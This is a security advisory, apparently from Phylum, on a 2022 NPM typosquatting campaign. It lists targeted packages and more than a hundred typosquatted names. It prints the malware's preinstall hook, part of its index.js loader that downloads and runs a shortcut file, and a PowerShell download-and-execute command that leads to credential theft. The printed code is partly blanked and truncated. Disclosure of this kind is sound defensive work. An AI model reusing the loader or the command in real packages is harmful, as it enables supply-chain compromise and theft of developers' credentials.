Phylum Detects Active Typosquatting Campaign Targeting NPM Developers

Early on Oct 2, 2022 Phylum's automated risk platform detected a large scale typosquatting campaign against NPM developers. The attackers targeted several high profile packages, including:
- shebang-command
- ignore
- webidl-conversions
- debug
- supports-colors
- anymatch
- universalify
- http-errors
- micromatch
- postcss-value-parse
- glob-parent
- string-width
- ansi-regex
- tslib
- y18n
These packages account for just over 1.2 Billion (1,204,473,993) downloads per week - a gigantic attack surface targeting a huge number of developers! Here is the full list of typosquatted packages:
1y8n |
hsebang-command |
postscs-value-parser |
tlsib |
ahs-flag |
http-erorrs |
potscss-value-parser |
tsilb |
anmyatch |
http-errros |
psotcss-value-parser |
tslbi |
ansi-ergex |
http-rerors |
sehbang-command |
tsring-width |
ansi-reegx |
ignoer |
setraverse |
uinversalify |
ansi-regxe |
ignroe |
sheabng-command |
unievrsalify |
ansi-rgeex |
igonre |
shebagn-command |
univeraslify |
anyamtch |
imcromatch |
shebang-cmomand |
universailfy |
anymacth |
ingore |
shebang-comamnd |
universalfiy |
anymathc |
jessc |
shebang-commadn |
universaliyf |
anymtach |
jsecs |
shebang-commnad |
universlaify |
asni-regex |
jssec |
shebang-ocmmand |
univesralify |
aynmatch |
lgob-parent |
shebnag-command |
univresalify |
deubg |
mciromatch |
sjesc |
uspports-color |
edbug |
micormatch |
spuports-color |
wbeidl-conversions |
esrtaverse |
micrmoatch |
srting-width |
webdl-conversions |
estarverse |
microamtch |
stirng-width |
webid-conversions |
estraevrse |
micromacth |
strign-width |
webidl-cnoversions |
estravesre |
micromathc |
string-iwdth |
webidl-conevrsions |
estravrese |
micromtach |
string-wdith |
webidl-converisons |
estrvaerse |
mircomatch |
string-widht |
webidl-conversinos |
etsraverse |
nasi-regex |
string-witdh |
webidl-conversion |
ewbidl-conversions |
naymatch |
strnig-width |
webidl-conversiosn |
ginore |
nuiversalify |
supoprts-color |
webidl-conversoins |
glbo-parent |
opstcss-value-parser |
supporst-color |
webidl-convesrions |
glob-paernt |
postcss-valeu-parser |
supports-cloor |
webidl-convresions |
glob-paretn |
postcss-value-aprser |
supports-colro |
webidl-covnersions |
glob-praent |
postcss-value-paresr |
supports-coolr |
webidl-ocnversions |
golb-parent |
postcss-value-parsre |
supports-oclor |
weibdl-conversions |
has-falg |
postcss-value-pasrer |
suppotrs-color |
y1n8 |
has-lfag |
postcss-vaule-parser |
supprots-color |
y81n |
hsa-flag |
postcss-vlaue-parser |
thtp-errors |
Although these packages were removed from NPM quickly, it is recommended that you verify that none of the packages were installed between the hours of 12:00 AM UTC and 6:00 PM UTC. If any packages were installed during this timeframe, consider the machine completely compromised.
Technical Details
Each of these packages are initially executed via a preinstall hook in the package.json file:
"preinstall": "node index.js"
This executes the index.js file which contains the following:
'use strict'
exports.fromCallback = function (fn) {
return Object.defineProperty(function (...args) {
if (typeof args[args.length - 1] === 'function') fn.apply(this, args)
else {
return new Promise((resolve, reject) => {
(err, res) => (err != null) ? reject(err) : resolve(res)
}, 'name', { value: })
exports.fromPromise = function (fn) {
return Object.defineProperty(function (...args) {
const cb = args[args.length - 1]
if (typeof cb !== 'function') return fn.apply(this, args)
else fn.apply(this, args.slice(0, -1)).then(r => cb(null, r), cb)
}, 'name', { value: })
var exec = require('child_process').exec;
const fs = require('fs');
const https = require('https');
const url = "";
https.get(url,(res) => {
const path = `${__dirname}/README.txt.lnk`;
const filePath = fs.createWriteStream(path);
filePath.on('finish',() => {
Which will download an MS Windows shortcut file (available on our Github) and execute it. This file contains the following command:
C:\Windows\System32\cmd.exe C:\Windows\System32p/c powershell.exe iwr -outf %tmp%\\p.vbs & %tmp%\\p.vbs.C:\Windows\System32\notepad.exe
Execution will result in the exfiltration of user credentials. Again, if you have inadvertently installed one of these packages consider the machine completely compromised.